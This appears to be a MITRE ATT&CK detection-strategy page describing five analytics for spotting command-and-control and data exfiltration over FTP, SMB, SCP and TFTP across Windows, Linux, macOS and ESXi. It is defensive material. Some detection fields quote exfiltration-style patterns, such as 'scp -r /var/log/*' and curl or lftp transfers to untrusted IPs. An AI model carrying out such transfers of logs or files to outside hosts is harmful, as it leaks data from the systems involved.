1. Home
  2. Detection Strategies
  3. Detection of File Transfer Protocol-Based C2 (FTP, FTPS, SMB, TFTP)

Detection of File Transfer Protocol-Based C2 (FTP, FTPS, SMB, TFTP)

Technique Detected:  File Transfer Protocols | T1071.002

ID: DET0416
Domains: Enterprise
Analytics: AN1169, AN1170, AN1171, AN1172, AN1173
Version: 1.0
Created: 21 October 2025
Last Modified: 21 October 2025
Version Permalink

Analytics

AN1169

Detects FTP, SMB, or TFTP traffic initiated by suspicious processes like PowerShell, cmd.exe, or rundll32.exe—especially with large outbound file transfers or unbalanced traffic volume.

Log Sources
Data Component Name Channel
Network Connection Creation (DC0082) WinEventLog:Sysmon EventCode=3
Process Creation (DC0032) WinEventLog:Sysmon EventCode=1
Network Traffic Content (DC0085) NSM:Flow ftp.log, smb_files.log
Mutable Elements
Field Description
ProcessImageFilter Limit to non-standard FTP clients or suspicious binaries (e.g., cmd, mshta)
DataFlowDirectionThreshold Ratio of outbound:inbound bytes; e.g., >90% outbound
FilenamePattern Suspicious file extensions or naming (e.g., .zip, .rar, random hash names)

AN1170

Detects usage of FTP, SCP, or TFTP by non-interactive shells or automation scripts transferring large data volumes to untrusted IPs.

Log Sources
Data Component Name Channel
Process Creation (DC0032) auditd:SYSCALL execve
Network Traffic Content (DC0085) NSM:Flow ftp.log, conn.log
Mutable Elements
Field Description
TransferSizeThreshold Bytes sent in FTP upload or SCP push
CommandLinePatternMatch e.g., scp -r /var/log/* or ftp upload scripts

AN1171

Detects Automator, AppleScript, or Terminal executing curl, lftp, or TFTP for binary transfer to untrusted IPs or unusual ports.

Log Sources
Data Component Name Channel
Network Traffic Flow (DC0078) macos:osquery socket_events
Command Execution (DC0064) macos:unifiedlog log stream --predicate
Mutable Elements
Field Description
FilePathAccessed e.g., ~/Documents, ~/Library/logs/
NetworkPortAnomaly Non-standard FTP/TFTP ports used (e.g., FTP over 443)

AN1172

Detects file movement or outbound TFTP/FTP transfers from ESXi host initiated via shell commands or injected scripts, particularly from scratch partitions or /tmp.

Log Sources
Data Component Name Channel
Command Execution (DC0064) esxi:shell /root/.ash_history
Network Traffic Content (DC0085) NSM:Flow mirror/SPAN port
Mutable Elements
Field Description
TransferTargetDomainOrIP Public IPs or domains not belonging to known ESXi mgmt infra
SourceDirectoryFilter Monitor transfers from /tmp/, /etc/, /vmfs/volumes/

AN1173

Detects internal hosts generating large outbound FTP/TFTP/SMB sessions to external IPs, or file transfers using non-standard ports and application mismatches (e.g., FTP over port 80).

Log Sources
Data Component Name Channel
Network Traffic Content (DC0085) NSM:Flow ftp.log, conn.log, smb_files.log
Mutable Elements
Field Description
AppLayerProtocolMatch e.g., FTP/SMB observed over uncommon ports
OutboundDataRateThreshold Bytes transferred outside trusted subnets >100MB